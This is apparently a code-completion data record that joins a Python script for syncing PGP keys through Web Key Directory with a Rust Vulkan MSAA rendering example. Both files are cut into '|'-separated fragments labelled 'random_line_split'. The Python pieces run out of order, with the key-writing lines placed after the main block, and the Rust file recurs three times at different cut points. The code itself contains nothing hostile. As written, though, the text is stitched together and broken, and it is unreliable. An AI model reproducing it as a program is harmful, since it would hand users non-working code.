# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Sync some PGP keys used in widely-used projects
This uses Web Key Directory (WKD) described on:
- https://wiki.gnupg.org/WKD
- https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
For information, to use WKD in the command-line:
gpg --auto-key-locate nodefault,wkd --locate-keys user@example.org
"""
import base64
import hashlib
from pathlib import Path
import re
import subprocess
import sys
import time
import tempfile
from typing import Union
import urllib.error
import urllib.parse
import urllib.request
KEYS_PATH = Path(__file__).parent / "keys.txt"
ALL_KEYS_PATH = Path(__file__).parent / "all_keys"
ZBASE32_ALPHABET = "ybndrfg8ejkmcpqxot1uwisza345h769"
ZBASE32_ALPHABET_REV = {c: i for i, c in enumerate(ZBASE32_ALPHABET)}
def opgp_crc24(data: bytes) -> int:
"""Computes the CRC24 used by OpenPGP Message Format
Specification: https://www.rfc-editor.org/rfc/rfc4880#section-6
#define CRC24_INIT 0xB704CE
#define CRC24_POLY 0x1864CFB
"""
crc = 0xB704CE
for byte in data:
crc ^= byte << 16
for _ in range(8):
crc <<= 1
if (crc & 0x1000000) != 0:
crc ^= 0x1864CFB
assert 0 <= crc <= 0xFFFFFF
return crc
def opgp_crc24_b64(data: bytes) -> str:
"""Computes the CRC24 used by OpenPGP Message Format, encoded in base64"""
crc = opgp_crc24(data)
return "=" + base64.b64encode(crc.to_bytes(3, "big")).decode("ascii")
def unarmor_gpg(armored: Union[bytes, str]) -> bytes:
if isinstance(armored, str):
lines = armored.splitlines()
else:
lines = armored.decode("ascii").splitlines()
if lines[0] != "-----BEGIN PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected first line {lines[0]!r}")
if lines[-1] != "-----END PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected last line {lines[0]!r}")
first_empty_line = lines.index("")
data = base64.b64decode("".join(lines[first_empty_line + 1:-2]))
computed_checksum = opgp_crc24_b64(data)
if lines[-2] != computed_checksum:
raise ValueError(f"unexpected checksum {lines[-2]!r}, expected {computed_checksum}")
return data
def zbase32_encode(data: bytes) -> str:
"""Encode some data using the z-base-32 encoding
This encoding is specified for ZRTP protocol in
https://www.rfc-editor.org/rfc/rfc6189.html#section-5.1.6
and used an alphabet described as:
This base32 encoding scheme differs from RFC 4648, and was designed
(by Bryce Wilcox-O'Hearn) to represent bit sequences in a form that
is convenient for human users to manipulate with minimal ambiguity.
The unusually permuted character ordering was designed for other
applications that use bit sequences that do not end on quintet
boundaries.
This hash is used by WKD and can be computed by GnuPG:
gpg --with-wkd-hash -k yourmail@example.org
"""
result = ""
for idx in range(0, len(data), 5):
result += ZBASE32_ALPHABET[(data[idx] & 0xF8) >> 3]
if idx + 1 == len(data):
result += ZBASE32_ALPHABET[(data[idx] & 0x07) << 2]
break
result += ZBASE32_ALPHABET[((data[idx] & 0x07) << 2) | ((data[idx + 1] & 0xC0) >> 6)]
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x3E) >> 1]
if idx + 2 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x01) << 4]
break
result += ZBASE32_ALPHABET[((data[idx + 1] & 0x01) << 4) | ((data[idx + 2] & 0xF0) >> 4)]
if idx + 3 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 2] & 0x0F) << 1]
break
result += ZBASE32_ALPHABET[((data[idx + 2] & 0x0F) << 1) | ((data[idx + 3] & 0x80) >> 7)]
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x7C) >> 2]
if idx + 4 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x03) << 3]
break
result += ZBASE32_ALPHABET[((data[idx + 3] & 0x03) << 3) | ((data[idx + 4] & 0xE0) >> 5)]
result += ZBASE32_ALPHABET[data[idx + 4] & 0x1F]
assert len(result) == (len(data) * 8 + 4) // 5
return result
def zbase32_decode(text: str) -> bytes:
"""Decode some data using the z-base-32 encoding"""
result = bytearray(len(text) * 5 // 8)
cur_byte = 0
cur_numbits = 0
idx = 0
for character in text:
value = ZBASE32_ALPHABET_REV[character]
cur_byte = (cur_byte << 5) | value
cur_numbits += 5
if cur_numbits >= 8:
cur_numbits -= 8
result[idx] = cur_byte >> cur_numbits
idx += 1
cur_byte &= (1 << cur_numbits) - 1
return bytes(result)
def get_wkd_advanced_url(email: str) -> str:
"""Craft an URL for WKD advanced method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://openpgpkey.{domain}/.well-known/openpgpkey/{domain}/hu/{local_b32}?{params}"
def get_wkd_direct_url(email: str) -> str:
"""Craft an URL for WKD direct method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://{domain}/.well-known/openpgpkey/hu/{local_b32}?{params}"
def self_check() -> None:
"""Verify that the algorithm computing WKD URLs work"""
assert len(ZBASE32_ALPHABET) == 32
# Test vector from https://github.com/matusf/z-base-32/blob/0.1.2/src/lib.rs
assert zbase32_encode(b"asdasd") == "cf3seamuco"
assert zbase32_decode("cf3seamuco") == b"asdasd"
# Test vector from https://www.uriports.com/blog/setting-up-openpgp-web-key-directory/
# assert zbase32_encode(hashlib.sha1(b"yourmail").digest()) == "hacabazoakmnagxwmkjerb9yehuwehbm"
# -> this hash is wrong, and I don't know what username gives the SHA1
# e61980e2f0c2962c19f45a928207e0472744702b
# Test vector from https://metacode.biz/openpgp/web-key-directory
assert zbase32_encode(hashlib.sha1(b"test-wkd").digest()) == "4hg7tescnttreaouu4z1izeuuyibwww1"
# Test vector from https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
assert (
get_wkd_advanced_url("Joe.Doe@Example.ORG")
== "https://openpgpkey.example.org/.well-known/openpgpkey/example.org/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe" # noqa
)
assert (
get_wkd_direct_url("Joe.Doe@Example.ORG")
== "https://example.org/.well-known/openpgpkey/hu/iy9q119eutrkn8s1mk4r39qejnbu3n5q?l=Joe.Doe"
)
# Test vector from https://wiki.gnupg.org/WKD
assert (
get_wkd_direct_url("bernhard.reiter@intevation.de")
== "https://intevation.de/.well-known/openpgpkey/hu/it5sewh54rxz33fwmr8u6dy4bbz8itz4?l=bernhard.reiter"
)
def get_pgp_key_id(raw_key: bytes) -> str:
"""Get the identifier of a key, using GnuPG"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
output = subprocess.check_output(
("gpg", "--list-packets"),
input=raw_key,
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
keyid_index = output.index(b"keyid: ") + 7
keyid_end_index = output.index(b"\n", keyid_index)
key_id = output[keyid_index:keyid_end_index].decode("ascii")
assert len(key_id) == 16
assert all(c in "0123456789ABCDEF" for c in key_id)
return key_id
def gpg_recv_key(key_id: str) -> bytes:
"""Receive a key using GnuPG using Ubuntu keyserver https://keyserver.ubuntu.com/"""
# Flush stdout and stderr to prevent interleaving messages from a subprocess
sys.stdout.flush()
sys.stderr.flush()
with tempfile.TemporaryDirectory(prefix="gnupghome") as tmpdir:
# Create an empty public keyring to avoid a GnuPG message
with (Path(tmpdir) / "pubring.kbx").open("wb"):
pass
with (Path(tmpdir) / "trustdb.gpg").open("wb"):
pass
# Retry several times, as sometimes the command fails with:
# gpg: keyserver receive failed: No data
try_count = 0
while 1:
try:
subprocess.check_output(
("gpg", "--keyserver", "hkps://keyserver.ubuntu.com", "--recv-keys", key_id),
input=b"",
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
break
except subprocess.CalledProcessError:
if try_count >= 10:
raise
print(f"Receiving key {key_id} failed [{try_count}], retrying...")
time.sleep(1)
try_count += 1
raw_key = subprocess.check_output(
("gpg", "--export", key_id),
env={
"GNUPGHOME": tmpdir,
"HOME": tmpdir,
},
)
return raw_key
def sync_keys(keys_path: Path) -> None:
"""Sync all the keys and refresh the given file"""
file_lines = []
with keys_path.open("r") as fkeys:
for line in fkeys:
line = line.strip()
if not line or line.startswith("#"):
# Keep comments and empty lines
file_lines.append(line)
continue
fields = line.split(" ")
if len(fields) < 2:
raise ValueError(f"Unexpected line: {line!r}")
current_key_id = fields[0]
email = fields[1]
raw_key = None
wkd_url = None
key_comment = None
if "@" in email:
email = email.lower()
# Download the key using WKD
wkd_url = get_wkd_advanced_url(email)
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
# Try the direct method when the advanced one failed
# Ignore domains which have issues in their configuration
if raw_key is None and not email.endswith("@att.net"):
wkd_url = get_wkd_direct_url(email)
raw_key = None
try:
with urllib.request.urlopen(wkd_url) as response:
raw_key = response.read()
except urllib.error.URLError:
pass
else:
print(f"Downloaded key for {email} from {wkd_url}")
key_comment = wkd_url
for url in fields[2:]:
# Check URL, and only keep the first valid key
with urllib.request.urlopen(url) as response:
armored_key = response.read()
try:
new_raw_key = unarmor_gpg(armored_key)
except ValueError as exc:
raise ValueError(f"Error in {url!r}: {exc}")
if new_raw_key == b"":
print(f"Downloaded empty key from {url}")
continue
if raw_key is None:
raw_key = new_raw_key
key_comment = url
print(f"Downloaded key from {url}")
# Try using GnuPG directly
if raw_key is None:
raw_key = gpg_recv_key(current_key_id)
key_comment = "received using GnuPG"
# Save the key using the key ID
key_id = get_pgp_key_id(raw_key)
file_name = email.replace("@", "_").replace("+", "_") + "_" + key_id + ".asc"
assert re.match(
r"^[A-Za-z][-0-9A-Za-z._]+$", file_name
), f"Unexpected characters in file name {file_name!r}"
print(f"Saving key for {email!r} in {'all_keys/' + file_name!r}")
b64_key = base64.b64encode(raw_key).decode("ascii")
with (ALL_KEYS_PATH / file_name).open("w") as fkey:
print("-----BEGIN PGP PUBLIC KEY BLOCK-----", file=fkey)
print(f"Comment: {key_comment}", file=fkey)
print("", file=fkey)
for offset in range(0, len(b64_key), 64):
print(b64_key[offset:offset + 64], file=fkey)
print(opgp_crc24_b64(raw_key), file=fkey) | new_line += " " + " ".join(fields[2:])
file_lines.append(new_line)
# Refresh the file
with keys_path.open("w") as fout:
print("\n".join(file_lines), file=fout)
if __name__ == "__main__":
self_check()
sync_keys(KEYS_PATH) | print("-----END PGP PUBLIC KEY BLOCK-----", file=fkey)
# Write the key ID in the file
new_line = f"0x{key_id} {email}"
if len(fields) > 2: | random_line_split |
10_msaa.rs | use itertools::izip;
use log::{info, warn, Level};
use sarekt::{
self,
error::{SarektError, SarektResult},
image_data::ImageData,
renderer::{
buffers_and_images::{
BufferType, IndexBufferElemSize, MagnificationMinificationFilter, TextureAddressMode,
},
config::{Config, MsaaConfig},
drawable_object::DrawableObject,
vertex_bindings::{DefaultForwardShaderLayout, DefaultForwardShaderVertex},
Drawer, Renderer, VulkanRenderer,
},
};
use std::{
collections::HashMap, convert::TryInto, f32, fs::File, io::Read, sync::Arc, time::Instant,
};
use ultraviolet as uv;
use wavefront_obj as obj;
use winit::{
dpi::{LogicalSize, PhysicalSize},
event::{ElementState, Event, VirtualKeyCode, WindowEvent},
event_loop::{ControlFlow, EventLoop},
platform::desktop::EventLoopExtDesktop,
window::{WindowBuilder, WindowId},
};
const WIDTH: u32 = 1600;
const HEIGHT: u32 = 1200;
const GLB_MODEL_FILE_NAME: &str = "models/chalet.glb";
const OBJ_MODEL_FILE_NAME: &str = "models/viking_room.obj";
const MODEL_TEXTURE_FILE_NAME_GLB: &str = "textures/chalet.jpg";
const MODEL_TEXTURE_FILE_NAME_OBJ: &str = "textures/viking_room.png";
fn main() {
simple_logger::init_with_level(Level::Info).unwrap();
main_loop();
}
/// Takes full control of the executing thread and runs the event loop for it.
fn main_loop() {
let args: Vec<String> = std::env::args().collect();
let show_fps = args.contains(&"fps".to_owned());
let use_glb = args.contains(&"glb".to_owned());
let msaa_level = if args.contains(&"4x".to_owned()) {
4u8
} else if args.contains(&"8x".to_owned()) {
8u8
} else if args.contains(&"noaa".to_owned()) {
1u8
} else {
2u8
};
info!("MSAA {}x", msaa_level);
info!("Show FPS: {}", show_fps);
info!("Use GLTF Model Type: {}", use_glb);
info!("Running main loop...");
let mut ar = WIDTH as f32 / HEIGHT as f32;
// Build Window.
let mut event_loop = EventLoop::new();
let window = Arc::new(
WindowBuilder::new()
.with_inner_size(LogicalSize::new(WIDTH, HEIGHT))
.build(&event_loop)
.unwrap(),
);
// Build Renderer.
let config = Config::builder()
.requested_width(WIDTH)
.requested_height(HEIGHT)
.msaa_config(MsaaConfig::new(
msaa_level.try_into().unwrap(),
Some(0.2f32),
))
.build()
.unwrap();
let mut renderer = VulkanRenderer::new(window.clone(), config).unwrap();
// Create Vertex Resources.
let (model_vertices, model_indices) = if use_glb {
load_glb_model(GLB_MODEL_FILE_NAME)
} else {
load_obj_models(OBJ_MODEL_FILE_NAME)
};
info!("Model file loaded");
let model_index_buffer = model_indices.map(|mi| {
renderer
.load_buffer(BufferType::Index(IndexBufferElemSize::UInt32), &mi)
.unwrap()
});
let model_buffer = renderer
.load_buffer(BufferType::Vertex, &model_vertices)
.unwrap();
// Create MVP uniform.
let uniform_handle = renderer
.load_uniform_buffer(DefaultForwardShaderLayout::default())
.unwrap();
// Load textures and create image.
let model_texture_file = if use_glb {
image::open(MODEL_TEXTURE_FILE_NAME_GLB).unwrap()
} else {
image::open(MODEL_TEXTURE_FILE_NAME_OBJ).unwrap()
};
let mip_levels = get_mip_levels(model_texture_file.dimensions());
let model_texture = renderer
.load_image_with_staging_initialization(
model_texture_file,
MagnificationMinificationFilter::Linear,
MagnificationMinificationFilter::Linear,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
mip_levels,
)
.unwrap();
let mut drawable_object_builder = DrawableObject::builder(&renderer)
.uniform_buffer(&uniform_handle)
.vertex_buffer(&model_buffer)
.texture_image(&model_texture);
if model_index_buffer.is_some() {
drawable_object_builder =
drawable_object_builder.index_buffer(model_index_buffer.as_ref().unwrap());
}
let drawable_object = drawable_object_builder.build().unwrap();
let start_time = Instant::now();
let mut last_frame_time = start_time;
let mut frame_number = 0;
let mut fps_average = 0f32;
let mut camera_height = -0.5f32;
// Run the loop.
event_loop.run_return(move |event, _, control_flow| {
// By default continuously run this event loop, even if the OS hasn't
// distributed an event, that way we will draw as fast as possible.
*control_flow = ControlFlow::Poll;
match event {
Event::MainEventsCleared => {
// All the main events to process are done we can do "work" now (game
// engine state update etc.)
let now = Instant::now();
let time_since_start_secs = ((now - start_time).as_millis() as f32) / 1000f32;
if show_fps {
let time_since_last_frame_secs = ((now - last_frame_time).as_nanos() as f32) / 1e9f32;
let fps = 1f32 / time_since_last_frame_secs;
if frame_number == 0 {
fps_average = 0f32;
} else {
fps_average =
((frame_number as f32 * fps_average) + fps) / (frame_number as f32 + 1f32);
}
frame_number += 1;
info!("Frame Period: {}", time_since_last_frame_secs);
info!("FPS: {}", fps);
info!("FPS averaged: {}", fps_average);
last_frame_time = now;
}
// Rise to max height then gently go back down.
let camera_rate = 0.25f32;
let min_camera_height = -0.5f32;
let camera_range = 2f32;
camera_height =
(camera_rate * time_since_start_secs) % (2.0f32 * camera_range) + min_camera_height;
if camera_height >= (camera_range + min_camera_height) {
camera_height = (2.0f32 * (camera_range + min_camera_height)) - camera_height;
}
let rotation = (std::f32::consts::PI + std::f32::consts::PI * time_since_start_secs / 8f32)
% (2f32 * std::f32::consts::PI);
update_uniforms(
&renderer,
&drawable_object,
uv::Vec3::new(0f32, -1f32, -1.5f32),
rotation,
camera_height,
false,
ar,
)
.unwrap();
renderer.draw(&drawable_object).unwrap();
// At the end of work request redraw.
window.request_redraw();
}
Event::RedrawRequested(_) => {
// Redraw requested, this is called after MainEventsCleared.
renderer.frame().unwrap_or_else(|err| {
match err {
SarektError::SwapchainOutOfDate | SarektError::SuboptimalSwapchain => {
// Handle window resize etc.
warn!("Tried to render without processing window resize event!");
let PhysicalSize { width, height } = window.inner_size();
renderer
.recreate_swapchain(width, height)
.expect("Error recreating swapchain");
}
e => panic!("Frame had an unrecoverable error! {}", e),
}
});
}
Event::WindowEvent { window_id, event } => {
main_loop_window_event(&event, &window_id, control_flow, &mut renderer, &mut ar)
.expect("Error processing window event.");
}
Event::LoopDestroyed => {
// Explicitly call exit so resources are cleaned up.
std::process::exit(0);
}
_ => (),
}
});
}
/// Handles all winit window specific events.
fn main_loop_window_event(
event: &WindowEvent, _id: &WindowId, control_flow: &mut winit::event_loop::ControlFlow,
renderer: &mut VulkanRenderer, ar: &mut f32,
) -> SarektResult<()> {
match event {
WindowEvent::CloseRequested => {
// When the window system requests a close, signal to winit that we'd like to
// close the window.
info!("Exiting due to close request event from window system...");
*control_flow = ControlFlow::Exit;
}
WindowEvent::KeyboardInput { input, .. } => {
// When the keyboard input is a press on the escape key, exit and print the
// line.
if let (Some(VirtualKeyCode::Escape), ElementState::Pressed) =
(input.virtual_keycode, input.state)
{
info!("Exiting due to escape press...");
*control_flow = ControlFlow::Exit
}
}
WindowEvent::Resized(size) => {
// If the size is 0, minimization or something like that happened so I
// toggle drawing.
info!("Window resized, recreating renderer swapchain...");
let enabled = !(size.height == 0 && size.width == 0);
if enabled {
*ar = size.width as f32 / size.height as f32;
}
renderer.set_rendering_enabled(enabled);
return renderer.recreate_swapchain(size.width, size.height);
}
_ => (),
}
Ok(())
}
fn update_uniforms(
renderer: &VulkanRenderer, object: &DrawableObject<VulkanRenderer, DefaultForwardShaderLayout>,
position: uv::Vec3, rotation: f32, camera_height: f32, enable_colors: bool, ar: f32,
) -> SarektResult<()> {
// Pi radians per second around the y axis.
let total_rotation =
uv::Mat4::from_rotation_y(rotation) * uv::Mat4::from_rotation_x(-std::f32::consts::PI / 2f32);
let model_matrix = uv::Mat4::from_translation(position) * total_rotation;
let view_matrix = uv::Mat4::look_at(
/* eye= */ uv::Vec3::new(0.0f32, camera_height, 0.0f32),
/* at= */ position,
/* up= */ uv::Vec3::unit_y(),
);
// TODO BACKENDS this proj should be conditional on backend.
let perspective_matrix =
uv::projection::rh_yup::perspective_vk(std::f32::consts::PI / 2f32, ar, 0.1f32, 10f32);
let uniform = DefaultForwardShaderLayout::new(
perspective_matrix * view_matrix * model_matrix,
enable_colors,
/* enable_texture_mixing= */ true,
);
object.set_uniform(renderer, &uniform)
}
/// For now only use the first object in the obj file.
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_obj_models(obj_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let mut model_file = File::open(obj_file_path).unwrap();
let mut model_file_text = String::new();
model_file.read_to_string(&mut model_file_text).unwrap();
let obj_set = obj::obj::parse(&model_file_text).unwrap();
if obj_set.objects.len() != 1 {
panic!(
"The model you attempted to load has more than one object in it, implying it is a scene, if \
you wish to use it as a single model, modify the application code to ignore that or join \
your meshes into a single model"
);
}
info!("Loaded model {}", OBJ_MODEL_FILE_NAME);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Vec<u32> = Vec::new();
// Map of inserted (obj_vertex_index, obj_texture_index) to index in the
// vertices array im building.
let mut inserted_indices: HashMap<(usize, usize), usize> = HashMap::new();
let model_vertices = &obj_set.objects[0].vertices; | for geo in obj_set.objects[0].geometry.iter() {
// For every set of geometry (regardless of material for now).
for shape in geo.shapes.iter() {
// For every face/shape in the set of geometry.
match shape.primitive {
obj::obj::Primitive::Triangle(x, y, z) => {
for &vert in [x, y, z].iter() {
// We're only building a buffer of indices and vertices which contain position
// and tex coord.
let index_key = (vert.0, vert.1.unwrap());
if let Some(&vtx_index) = inserted_indices.get(&index_key) {
// Already loaded this (vertex index, texture index) combo, just add it to the
// index buffer.
indices.push(vtx_index as _);
continue;
}
// This is a new unique vertex (where a vertex is both a position and it's
// texture coordinate) so add it to the vertex buffer and the index buffer.
let current_vertex = model_vertices[vert.0];
let vertex_as_float = [
current_vertex.x as f32,
current_vertex.y as f32,
current_vertex.z as f32,
];
let texture_vertices = &obj_set.objects[0].tex_vertices;
let tex_vertex = texture_vertices[vert.1.unwrap()];
// TODO BACKENDS only flip on coordinate systems that should.
let texture_vertex_as_float = [tex_vertex.u as f32, 1f32 - tex_vertex.v as f32];
// Ignoring normals, there is no shading in this example.
// Keep track of which keys were inserted and add this vertex to the index
// buffer.
inserted_indices.insert(index_key, vertices.len());
indices.push(vertices.len() as _);
// Add to the vertex buffer.
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&vertex_as_float,
&texture_vertex_as_float,
));
}
}
_ => warn!("Unsupported primitive!"),
}
}
}
info!(
"Vertices/indices in model: {}, {}",
vertices.len(),
indices.len()
);
(vertices, Some(indices))
}
/// Returns (vertices, vertex_indicies, texture_coordinate indices)
fn load_glb_model(gltf_file_path: &str) -> (Vec<DefaultForwardShaderVertex>, Option<Vec<u32>>) {
let (document, buffers, _) = gltf::import(gltf_file_path).unwrap();
if document.scenes().len() != 1 || document.scenes().next().unwrap().nodes().len() != 1 {
panic!(
"The model you attempted to load has more than one scene or node in it, if you wish to use \
it as a single model, modify the application code to ignore that or join your meshes into \
a single model"
);
}
let mesh = document.meshes().nth(0).unwrap();
info!("Loaded model {}", gltf_file_path);
let mut vertices: Vec<DefaultForwardShaderVertex> = Vec::new();
let mut indices: Option<Vec<u32>> = None;
for primitive in mesh.primitives() {
let reader = primitive.reader(|buffer| Some(&buffers[buffer.index()]));
let positions = reader.read_positions().unwrap();
let tex_coords = reader.read_tex_coords(0).unwrap().into_f32();
for (position, tex_coord) in izip!(positions, tex_coords) {
vertices.push(DefaultForwardShaderVertex::new_with_texture(
&position, &tex_coord,
));
}
reader
.read_indices()
.map(|it| indices.get_or_insert(Vec::new()).extend(&mut it.into_u32()));
}
info!(
"Vertices/indices in model: {}, {:?}",
vertices.len(),
indices.as_ref().map(|i| i.len())
);
(vertices, indices)
}
fn get_mip_levels(dimensions: (u32, u32)) -> u32 {
let w = dimensions.0;
let h = dimensions.1;
(w.max(h) as f32).log2().floor() as u32 + 1
} | random_line_split | |
10_msaa.rs | use itertools::izip;
use log::{info, warn, Level};
use sarekt::{
self,
error::{SarektError, SarektResult},
image_data::ImageData,
renderer::{
buffers_and_images::{
BufferType, IndexBufferElemSize, MagnificationMinificationFilter, TextureAddressMode,
},
config::{Config, MsaaConfig},
drawable_object::DrawableObject,
vertex_bindings::{DefaultForwardShaderLayout, DefaultForwardShaderVertex},
Drawer, Renderer, VulkanRenderer,
},
};
use std::{
collections::HashMap, convert::TryInto, f32, fs::File, io::Read, sync::Arc, time::Instant,
};
use ultraviolet as uv;
use wavefront_obj as obj;
use winit::{
dpi::{LogicalSize, PhysicalSize},
event::{ElementState, Event, VirtualKeyCode, WindowEvent},
event_loop::{ControlFlow, EventLoop},
platform::desktop::EventLoopExtDesktop,
window::{WindowBuilder, WindowId},
};
const WIDTH: u32 = 1600;
const HEIGHT: u32 = 1200;
const GLB_MODEL_FILE_NAME: &str = "models/chalet.glb";
const OBJ_MODEL_FILE_NAME: &str = "models/viking_room.obj";
const MODEL_TEXTURE_FILE_NAME_GLB: &str = "textures/chalet.jpg";
const MODEL_TEXTURE_FILE_NAME_OBJ: &str = "textures/viking_room.png";
fn main() {
simple_logger::init_with_level(Level::Info).unwrap();
main_loop();
}
/// Takes full control of the executing thread and runs the event loop for it.
fn main_loop() {
let args: Vec<String> = std::env::args().collect();
let show_fps = args.contains(&"fps".to_owned());
let use_glb = args.contains(&"glb".to_owned());
let msaa_level = if args.contains(&"4x".to_owned()) {
4u8
} else if args.contains(&"8x".to_owned()) {
8u8
} else if args.contains(&"noaa".to_owned()) {
1u8
} else {
2u8
};
info!("MSAA {}x", msaa_level);
info!("Show FPS: {}", show_fps);
info!("Use GLTF Model Type: {}", use_glb);
info!("Running main loop...");
let mut ar = WIDTH as f32 / HEIGHT as f32;
// Build Window.
let mut event_loop = EventLoop::new();
let window = Arc::new(
WindowBuilder::new()
.with_inner_size(LogicalSize::new(WIDTH, HEIGHT))
.build(&event_loop)
.unwrap(),
);
// Build Renderer.
let config = Config::builder()
.requested_width(WIDTH)
.requested_height(HEIGHT)
.msaa_config(MsaaConfig::new(
msaa_level.try_into().unwrap(),
Some(0.2f32),
))
.build()
.unwrap();
let mut renderer = VulkanRenderer::new(window.clone(), config).unwrap();
// Create Vertex Resources.
let (model_vertices, model_indices) = if use_glb {
load_glb_model(GLB_MODEL_FILE_NAME)
} else {
load_obj_models(OBJ_MODEL_FILE_NAME)
};
info!("Model file loaded");
let model_index_buffer = model_indices.map(|mi| {
renderer
.load_buffer(BufferType::Index(IndexBufferElemSize::UInt32), &mi)
.unwrap()
});
let model_buffer = renderer
.load_buffer(BufferType::Vertex, &model_vertices)
.unwrap();
// Create MVP uniform.
let uniform_handle = renderer
.load_uniform_buffer(DefaultForwardShaderLayout::default())
.unwrap();
// Load textures and create image.
let model_texture_file = if use_glb {
image::open(MODEL_TEXTURE_FILE_NAME_GLB).unwrap()
} else {
image::open(MODEL_TEXTURE_FILE_NAME_OBJ).unwrap()
};
let mip_levels = get_mip_levels(model_texture_file.dimensions());
let model_texture = renderer
.load_image_with_staging_initialization(
model_texture_file,
MagnificationMinificationFilter::Linear,
MagnificationMinificationFilter::Linear,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
TextureAddressMode::ClampToEdge,
mip_levels,
)
.unwrap();
let mut drawable_object_builder = DrawableObject::builder(&renderer)
.uniform_buffer(&uniform_handle)
.vertex_buffer(&model_buffer)
.texture_image(&model_texture);
if model_index_buffer.is_some() {
drawable_object_builder =
drawable_object_builder.index_buffer(model_index_buffer.as_ref().unwrap());
}
let drawable_object = drawable_object_builder.build().unwrap();
let start_time = Instant::now();
let mut last_frame_time = start_time;
let mut frame_number = 0;
let mut fps_average = 0f32;
let mut camera_height = -0.5f32;
// Run the loop.
event_loop.run_return(move |event, _, control_flow| {
// By default continuously run this event loop, even if the OS hasn't
// distributed an event, that way we will draw as fast as possible.
*control_flow = ControlFlow::Poll;
match event {
Event::MainEventsCleared => {
// All the main events to process are done we can do "work" now (game
// engine state update etc.)
let now = Instant::now();
let time_since_start_secs = ((now - start_time).as_millis() as f32) / 1000f32;
if show_fps {
let time_since_last_frame_secs = ((now - last_frame_time).as_nanos() as f32) / 1e9f32;
let fps = 1f32 / time_since_last_frame_secs;
if frame_number == 0 {
fps_average = 0f32;
} else {
fps_average =
((frame_number as f32 * fps_average) + fps) / (frame_number as f32 + 1f32);
}
frame_number += 1;
info!("Frame Period: {}", time_since_last_frame_secs);
info!("FPS: {}", fps);
info!("FPS averaged: {}", fps_average);
last_frame_time = now;
}
// Rise to max height then gently go back down.
let camera_rate = 0.25f32;
let min_camera_height = -0.5f32;
let camera_range = 2f32;
camera_height =
(camera_rate * time_since_start_secs) % (2.0f32 * camera_range) + min_camera_height;
if camera_height >= (camera_range + min_camera_height) {
camera_height = (2.0f32 * (camera_range + min_camera_height)) - camera_height;
}
let rotation = (std::f32::consts::PI + std::f32::consts::PI * time_since_start_secs / 8f32)
% (2f32 * std::f32::consts::PI);
update_uniforms(
&renderer,
&drawable_object,
uv::Vec3::new(0f32, -1f32, -1.5f32),
rotation,
camera_height,
false,
ar,
)
.unwrap();
renderer.draw(&drawable_object).unwrap();
// At the end of work request redraw.
window.request_redraw();
}
Event::RedrawRequested(_) => {
// Redraw requested, this is called after MainEventsCleared.
renderer.frame().unwrap_or_else(|err| {
match err {
SarektError::SwapchainOutOfDate | SarektError::SuboptimalSwapchain => {
// Handle window resize etc.
warn!("Tried to render without processing window resize event!");
let PhysicalSize { width, height } = window.inner_size();
renderer
.recreate_swapchain(width, height)
.expect("Error recreating swapchain");
}
e => panic!("Frame had an unrecoverable error! {}", e),
}
});
}
Event::WindowEvent { window_id, event } => {
main_loop_window_event(&event, &window_id, control_flow, &mut renderer, &mut ar)
.expect("Error processing window event.");
}
Event::LoopDestroyed => {
// Explicitly call exit so resources are cleaned up.
std::process::exit(0);
}
_ => (),
}
});
}
/// Handles all winit window specific events.
fn main_loop_window_event(
event: &WindowEvent, _id: &WindowId, control_flow: &mut winit::event_loop::ControlFlow,
renderer: &mut VulkanRenderer, ar: &mut f32,
) -> SarektResult<()> {
match event {
WindowEvent::CloseRequested => {
// When the window system requests a close, signal to winit that we'd like to
// close the window.
info!("Exiting due to close request event from window system...");
*control_flow = ControlFlow::Exit;
}
WindowEvent::KeyboardInput { input, .. } => {
// When the keyboard input is a press on the escape key, exit and print the
// line.
if let (Some(VirtualKeyCode::Escape), ElementState::Pressed) =
(input.virtual_keycode, input.state)
{
info!("Exiting due to escape press...");
*control_flow = ControlFlow::Exit
}
}
WindowEvent::Resized(size) => {
// If the size is 0, minimization or something like that happened so I
// toggle drawing.
info!("Window resized, recreating renderer swapchain...");
let enabled = !(size.height == 0 && size.width == 0);
if enabled {
*ar = size.width as f32 / size.height as f32;
}
renderer.set_rendering_enabled(enabled);
